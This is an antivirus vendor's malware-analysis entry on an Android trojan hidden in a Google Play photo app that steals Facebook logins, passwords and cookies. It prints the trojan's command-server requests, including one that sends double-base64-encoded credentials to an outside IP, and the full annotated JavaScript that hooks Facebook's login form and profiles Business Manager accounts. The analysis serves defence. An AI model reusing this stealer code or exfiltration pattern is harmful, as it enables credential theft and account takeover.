
Android.PWS.Facebook.17

Added to the Dr.Web virus database: 2021-06-22

Virus description added:

SHA1 hash:

  • 2b931978aaee9e2a9d35b1f8bf35a9b89b74d2fa

Description

A trojan application for Android-powered devices. It is the same trojan as Android.PWS.Facebook.13, Android.PWS.Facebook.14, and Android.PWS.Facebook.15, but written in the Dart language using the Flutter framework.

Its main functionality is stealing logins and passwords of Facebook accounts. The analyzed modification hid in the PIP Photo application that was available on Google Play. However, the trojan can also be spread under the guise of other software.

screenshot Android.PWS.Facebook.17 #drweb

Operating routine

Upon launch, Android.PWS.Facebook.17 receives its configuration from the C&C server at 108[.]160.132[.]15:

POST /index2.php?r=user/init& HTTP/1.1
user-agent: Dart/2.10 (dart:io)
content-type: multipart/form-data; boundary=--dio-boundary-3920830045
accept-encoding: gzip
content-length: 129
host: 108.160.132.15
----dio-boundary-3920830045
content-disposition: form-data; name="appId"
com.piphoto.pipsapp
----dio-boundary-3920830045--
  
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: XXX, XX XXX 2021 XX:XX:XX GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
  
  
{
    "retCode":0,
    "u":"https:\/\/www.facebook.com\/login.php",
    "ds":0,
    "d":"function ...\r\n"
}

where

  • d is a field containing the JavaScript code that the trojan uses to steal victims’ confidential data;
  • u is a field containing the URL of the web page with the authorization form to be loaded. During the analysis, the trojan received a configuration instructing it to display the genuine Facebook login page https://www.facebook.com/login. However, it can also load web pages of other legitimate services and phishing sites.

The JavaScript from the d field that is used to steal authorization data is shown below:


// Debug helper: writes msg to the console of the WebView the script runs in.
// The numbered progress markers passed to it further down ("=============111"
// and so on) are the trace the script leaves in console output, which makes
// them a convenient string to look for when reviewing a suspect app's WebView logs.
function Logs(msg) {
    console.log(msg)
}
// Harvests whatever has been typed into Facebook's login form.
// First attempt uses the desktop form field ids ("email" / "pass"). If that
// throws (e.g. an element is missing, so .value is read from null), the
// mobile form ids ("m_login_email" / "m_login_password") are tried instead.
// A pair is only forwarded when both fields are non-empty.
// `t` is not defined anywhere in this script — presumably an object the host
// application injects into the WebView; t.a receives the login/password pair.
// Errors in the fallback path are swallowed, so the script never surfaces a failure.
function exec() {
    try {
        var m = document.getElementById("email").value;
        var p = document.getElementById("pass").value;
        if (m.length <= 0 || p.length <= 0) {
            return false
        }
        t.a(m, p)
    } catch (e) {
        try {
            // Mobile (m.facebook.com) form layout.
            var m = document.getElementById("m_login_email").value;
            var p = document.getElementById("m_login_password").value;
            if (m.length <= 0 || p.length <= 0) {
                return false
            }
            t.a(m, p)
        } catch (e) {}
    }
}
// Hooks the login form so that exec() runs at the moment the user submits it.
// Desktop layout: form id "loginform", its first <button>. If that throws,
// the mobile layout is tried: form id "login_form", the first <button> whose
// name starts with "login". In both cases exec() is attached to the button's
// "touchend" and "click" events, and document.onkeydown is overwritten so that
// pressing Enter (keyCode 13) anywhere on the page also triggers exec().
// Failures in the fallback path are swallowed.
function login() {
    try {
        var loginFormObj = document.getElementById("loginform");
        loginFormObj.getElementsByTagName("button")[0].addEventListener("touchend", function() {
            exec()
        });
        loginFormObj.getElementsByTagName("button")[0].addEventListener("click", function() {
            exec()
        });
        // Replaces any existing keydown handler on the document.
        document.onkeydown = function(event) {
            if (event.keyCode === 13) {
                exec()
            }
        }
    } catch (e) {
        try {
            // Mobile form layout.
            var loginFormObj = document.getElementById("login_form");
            loginFormObj.querySelectorAll("button[name^=login]")[0].addEventListener("touchend", function() {
                exec()
            });
            loginFormObj.querySelectorAll("button[name^=login]")[0].addEventListener("click", function() {
                exec()
            });
            document.onkeydown = function(event) {
                if (event.keyCode === 13) {
                    exec()
                }
            }
        } catch (e) {}
    }
}
// Entry point. Behaviour depends on the URL of the page the host application
// loaded into the WebView (the "u" field of the C&C configuration).
var testpclogin = /facebook\.com\/login\.php/i;
var testwaplogin = /m.facebook\.com\/$|m.facebook\.com\/login\.php/i;
if (testpclogin.test(window.location.href) || testwaplogin.test(window.location.href)) {
    // Desktop or mobile login page: hook the form so the credentials are
    // captured on submit (see login() / exec()).
    login()
} else {
    // Any other page: wait 8 s, then try to profile the already logged-in account.
    setTimeout(function() {
        Logs("=============111");
        try {
            Logs("=============22222");
            var testurl = /facebook\.com\/bookmarks\/pages/i;
            var testbmurl = /business\.facebook\.com/i;
            if (testurl.test(window.location.href)) {
                // The URL suggests this is the account's list of bookmarked
                // pages — not confirmed here. The list container is looked up
                // in the top document first, then inside the first iframe.
                Logs("=============33333");
                var obj = document.getElementById("bookmarksSeeAllEntSection");
                if (obj == null) {
                    Logs("=============33333++++++");
                    obj = document.getElementsByTagName("iframe")[0].contentDocument.getElementById("bookmarksSeeAllEntSection")
                }
                if (obj != null) {
                    Logs("=============44444");
                    var len = obj.getElementsByTagName("li").length;
                    if (len > 0) {
                        Logs("=============55555");
                        // Reported to the host through the injected bridge
                        // object `t`. The meaning of t.c's numeric arguments
                        // is not visible in this script — possibly a
                        // category/status code for the account; unconfirmed.
                        t.c(1, 1)
                    }
                }
                // One second later, navigate to Business Manager.
                // NOTE(review): as printed on this page the next line does not
                // parse (a "{" inside the string literal and a "}" right after
                // it); it looks like an extraction artifact rather than the
                // original code, so the listing as shown is not runnable as-is.
                setTimeout(function() {
                    Logs("=============66666666");
                    window.location = "{https://business.facebook.com/"}
                }, 1000)
            } else {
                if (testbmurl.test(window.location.href)) {
                    // Business Manager: wait another 3 s, then classify the
                    // landing URL and report the outcome through t.c(2, ...).
                    setTimeout(function() {
                        Logs("=============7777777777777");
                        var testbmurl1 = /business\.facebook\.com\/home\/accounts\?business_id=[0-9]+/i;
                        var testbmurl2 = /business\.facebook\.com\/select\/\?next=/i;
                        if (testbmurl1.test(window.location.href)) {
                            // Accounts overview of a specific business:
                            // t.c(2, 3) when at least one div[adaccountid]
                            // element exists, t.c(2, 1) otherwise (also on
                            // any exception while counting).
                            try {
                                var adcount = document.querySelectorAll("div[adaccountid]").length;
                                if (adcount > 0) {
                                    t.c(2, 3)
                                } else {
                                    t.c(2, 1)
                                }
                            } catch (e) {
                                t.c(2, 1)
                            }
                        } else {
                            if (testbmurl2.test(window.location.href)) {
                                // Business-selection page.
                                Logs("=============88888888888");
                                t.c(2, 1)
                            } else {
                                // Any other business.facebook.com URL.
                                Logs("=============99999999999");
                                t.c(2, 2)
                            }
                        }
                    }, 3000)
                }
            }
        } catch (e) {}
    }, 8000)
};

Authorization data theft

Android.PWS.Facebook.17 creates a local database, pip.db, containing the app’s data, which will include the stolen login, password and cookies:

screenshot Android.PWS.Facebook.17 #drweb

When the user taps any button in the trojan application's menu, they are shown the genuine login form of the Facebook social network.

screenshot Android.PWS.Facebook.17 #drweb

After the victim has successfully logged in to Facebook, Android.PWS.Facebook.17 saves the data to the database and sends a request to the C&C server as shown below:

POST /idx2.php?t=lShuXXXX/dl&yybs=com.piphoto.pipsapp&yzxx=ZXlK[...]ZlE9PQ%3D%3D&gj=en&sbbs=ssbs HTTP/1.1
user-agent: Dart/2.10 (dart:io)
accept-encoding: gzip
content-length: 0
host: 108.160.132.15

The yzxx parameter contains the user data, double-encoded in base64. An example of the sent data:

{
    "ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36",
    "password":"XXXXXXXX",
    "page":"1",
    "cookie":"sb=XXXXXXXXXXX; datr=XXXXXXXXXXX; dpr=X; wd=9999x8888; c_user=XXXXXXXXXXXX; xs=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; fr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; spin=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
    "name":"XXXXXXXXXXXXX@XXXXXXXXX.com",
    "bm":1
}

Indicators of compromise

News about the trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android
